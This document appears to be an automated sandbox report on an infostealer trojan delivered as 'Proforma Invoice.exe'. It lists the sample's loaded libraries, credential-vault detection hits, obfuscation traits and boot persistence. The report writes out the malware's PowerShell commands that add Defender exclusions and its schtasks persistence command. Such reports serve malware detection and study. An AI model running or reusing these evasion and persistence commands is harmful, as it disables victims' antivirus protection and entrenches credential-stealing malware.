                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeSection loaded: edputil.dll
                        Source: Proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: VoAlKljQu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, fJ.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, UyDMxsd3t.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, 86A7K.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, vztq.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, B80ITW1.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, uQSn7t.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@2/2
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMutant created: \Sessions\1\BaseNamedObjects\TzoYpGstWoYJF
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2AAD.tmpJump to behavior
                        Source: Proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Proforma Invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Proforma Invoice.exeReversingLabs: Detection: 63%
                        Source: Proforma Invoice.exeVirustotal: Detection: 65%
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile read: C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmpJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Proforma Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: Proforma Invoice.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                        Source: VoAlKljQu.exe.0.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, Architectural.cs.Net Code: Justy
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, Architectural.cs.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, Architectural.cs.Net Code: Justy
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, Architectural.cs.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC04A0 pushfd ; ret 0_2_06EC04A1
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC3DF7 pushad ; ret 0_2_06EC3DFE
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC3DC1 pushfd ; ret 0_2_06EC3DC2
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_06EC320B push eax; iretd 0_2_06EC320E
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013C0B4D push edi; ret 8_2_013C0CC2
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_013C0C95 push edi; retf 8_2_013C0C3A
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_05200D70 pushad ; retf 9_2_05200D71
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07192B9E pushfd ; retf 9_2_07192BA0
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07192BBC pushfd ; retf 9_2_07192BBD
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07192BDA pushfd ; retf 9_2_07192BDB
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07192BF6 pushfd ; retf 9_2_07192BF8
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_0719320B push eax; iretd 9_2_0719320E
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07193DC1 pushfd ; ret 9_2_07193DC2
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07193DF7 pushad ; ret 9_2_07193DFE
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_07192C2D pushfd ; retf 9_2_07192C2E
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 9_2_071904A0 pushfd ; ret 9_2_071904A1
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_01030B4D push edi; ret 13_2_01030CC2
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeCode function: 13_2_01030C95 push edi; retf 13_2_01030C3A
                        Source: Proforma Invoice.exeStatic PE information: section name: .text entropy: 7.971460179462412
                        Source: VoAlKljQu.exe.0.drStatic PE information: section name: .text entropy: 7.971460179462412
                        Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, ybbGOTR1N80dNbk6Yv.csHigh entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, LinkedList.csHigh entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, Architectural.csHigh entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
                        Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.csHigh entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, ybbGOTR1N80dNbk6Yv.csHigh entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, LinkedList.csHigh entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, Architectural.csHigh entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, MainForm.csHigh entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
                        Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.csHigh entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'
                        Source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeFile created: C:\Users\user\AppData\Roaming\VoAlKljQu.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
